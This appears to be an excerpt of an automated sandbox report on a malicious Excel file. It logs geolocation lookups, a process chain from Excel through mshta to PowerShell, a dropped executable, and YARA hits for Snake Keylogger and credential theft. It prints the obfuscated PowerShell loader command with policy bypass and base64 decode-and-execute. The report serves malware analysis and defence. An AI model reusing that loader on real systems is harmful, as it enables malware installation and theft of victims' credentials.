                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiyoYcVNmb7rXPOEBRuRTEPxueUR6%2FwFNsYaIcE3VuH0oG%2FsyhoBpLyMsNGfxP5anE7K7yt4Yf17xpLwpywsnhCSxwB98wGfsVx5sIDfOGHhp7FpGDZtRcn%2Bp7O7emVP5VcxZC1r"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c059db1b78e1-EWR
                                                                                  2024-09-30 08:13:02 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.22 | 49192 | 188.114.97.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:03 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:03 UTC | 681 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 14
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpFFMFyQyhdQpGfG%2BCXm6BN7yVXFGKEI5lwGcJ4HlFC%2Bvkfjb%2BeEtit7OZLlZg4hJD6X1dNHDwTg%2F8vme4teKbixF6yPpSs4%2FnIehIePSGaW5TyQVUADUbeHMno%2B%2BVMgv2VQMwiB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0639df97c7b-EWR
                                                                                  2024-09-30 08:13:03 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.22 | 49194 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:05 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:05 UTC | 679 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:05 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 16
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULjF4Q4YDBB7Vi9wFiRXv%2BHMwvhyalHaJOVxj3qe9HrhDLZkD19sYvx6x5CDg94J%2B31yyqIkX%2Fm1ZKuirigly%2FRq%2BNAIe5pJ%2FRKQFRZ39Ah7EDY0CMJuxbIhqFpCrQ0fenzfNQ3a"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c06ecc488cc6-EWR
                                                                                  2024-09-30 08:13:05 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.22 | 49196 | 188.114.97.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:07 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:07 UTC | 675 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 18
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PcqSpDJLn7Ey3V6fI%2B%2F2KP0JIXxRvC6mvE7%2BX3kAg9g69Pl2PC%2Bz0ovyn8WjiNVbaaWzRsENBDZIb0TuYzoz2a904CzbzTBqH6LfuBLG9TgSUELSXkXeBGDHlH0rZtzlPF41Owz6"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0776b95439c-EWR
                                                                                  2024-09-30 08:13:07 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.22 | 49198 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:08 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:08 UTC | 673 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:08 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 19
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOClo4XR1fuOnErL0eBierT%2B8Q353h%2FJbtXFXiKJlgTiafJklZrz1gcHK3OZC1fHHtaNYI70QYnfV2XiLrtIeYjs2Hz21wsNOgqg1IUNWFE%2B5zcVHjf9mC3xNAXJUGuE4HlGTBvA"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c07f89174376-EWR
                                                                                  2024-09-30 08:13:08 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.22 | 49200 | 188.114.97.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:09 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:09 UTC | 675 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 20
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=psZXysUQbBOZfaAfsiXpP7Az4N99rwVtVO%2BgJQHywa3TF7Et%2F3r9OHjdodIxbJyLJDMj7JZHkaJxRJx4tgXayTRrzmufo6Xa%2Ba7RmEv0FFwcuYmP9%2Fh3Jmc04R4vSvPW3lGvLOCw"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0880bd11a07-EWR
                                                                                  2024-09-30 08:13:09 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.22 | 49202 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:11 UTC | 671 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 22
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uS1x1Yi8q626ocZZCaSyaOKMi4FcQAw33fhbS6a4TL3VEqq2SOqUi6rwhXLBKtV3jdnLGApFeDzHQW9rV4PE29Zk%2BV7KveM7vlNbRhcckapLhavknZVLfdO4NVWFre8qHN%2FxKxl5"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0953f8b4310-EWR
                                                                                  2024-09-30 08:13:11 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Target ID:0
                                                                                  Start time:04:11:55
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                  Imagebase:0x13f8e0000
                                                                                  File size:28'253'536 bytes
                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:04:12:18
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                  Imagebase:0x13f730000
                                                                                  File size:13'824 bytes
                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:04:12:22
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x49f50000
                                                                                  File size:345'088 bytes
                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:04:12:22
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x13fc90000
                                                                                  File size:443'392 bytes
                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:04:12:28
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
                                                                                  Imagebase:0x13f390000
                                                                                  File size:2'758'280 bytes
                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:04:12:29
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
                                                                                  Imagebase:0x13f960000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:04:12:34
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'028'673 bytes
                                                                                  MD5 hash:7F0098DCC054A27F80296ADF300573EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:04:12:40
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                  Imagebase:0x13fac0000
                                                                                  File size:13'824 bytes
                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:04:12:41
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0xf50000
                                                                                  File size:45'248 bytes
                                                                                  MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:15
                                                                                  Start time:04:12:43
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x49e30000
                                                                                  File size:345'088 bytes
                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:04:12:43
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x13f470000
                                                                                  File size:443'392 bytes
                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:18
                                                                                  Start time:04:12:45
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
                                                                                  Imagebase:0x13fb70000
                                                                                  File size:2'758'280 bytes
                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:19
                                                                                  Start time:04:12:46
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
                                                                                  Imagebase:0x13f180000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:22
                                                                                  Start time:04:12:51
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'028'673 bytes
                                                                                  MD5 hash:7F0098DCC054A27F80296ADF300573EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:23
                                                                                  Start time:04:12:58
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0xf50000
                                                                                  File size:45'248 bytes
                                                                                  MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                  Has exited:false


                                                                                  Module: Sheet1

                                                                                  Declaration
                                                                                  Attribute VB_Name = "Sheet1"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True

                                                                                  Module: Sheet2

                                                                                  Declaration
                                                                                  Attribute VB_Name = "Sheet2"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True

                                                                                  Module: Sheet3

                                                                                  Declaration
                                                                                  Attribute VB_Name = "Sheet3"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True

                                                                                  Module: ThisWorkbook

                                                                                  Declaration
                                                                                  Attribute VB_Name = "ThisWorkbook"
                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.415774452.0000000002930000.00000010.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_2930000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction ID: 4fff86b122d9a78aabb0473233b036b3461d46438ee885076d970452d3b182d6
                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction Fuzzy Hash:

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 3861 7fe899a7ae1 3862 7fe899a7af1 URLDownloadToFileW 3861->3862 3864 7fe899a7c00 3862->3864

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 102 7fe899a7018-7fe899a7ba1 106 7fe899a7bab-7fe899a7bb1 102->106 107 7fe899a7ba3-7fe899a7ba8 102->107 108 7fe899a7bbb-7fe899a7bfe URLDownloadToFileW 106->108 109 7fe899a7bb3-7fe899a7bb8 106->109 107->106 110 7fe899a7c06-7fe899a7c23 108->110 111 7fe899a7c00 108->111 109->108 111->110
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451509907.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: DownloadFile
                                                                                    • String ID:
                                                                                    • API String ID: 1407266417-0
                                                                                    • Opcode ID: a7c5f9d6028f485ef64889265750188a8f8e518ecce8b77a092c6d948952a0cc
                                                                                    • Instruction ID: 1e115c36a6d05284c9c75bbbe2c80801aea70e8c3bf9f87b55bd9e2196316f6b
                                                                                    • Opcode Fuzzy Hash: a7c5f9d6028f485ef64889265750188a8f8e518ecce8b77a092c6d948952a0cc
                                                                                    • Instruction Fuzzy Hash: E731917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
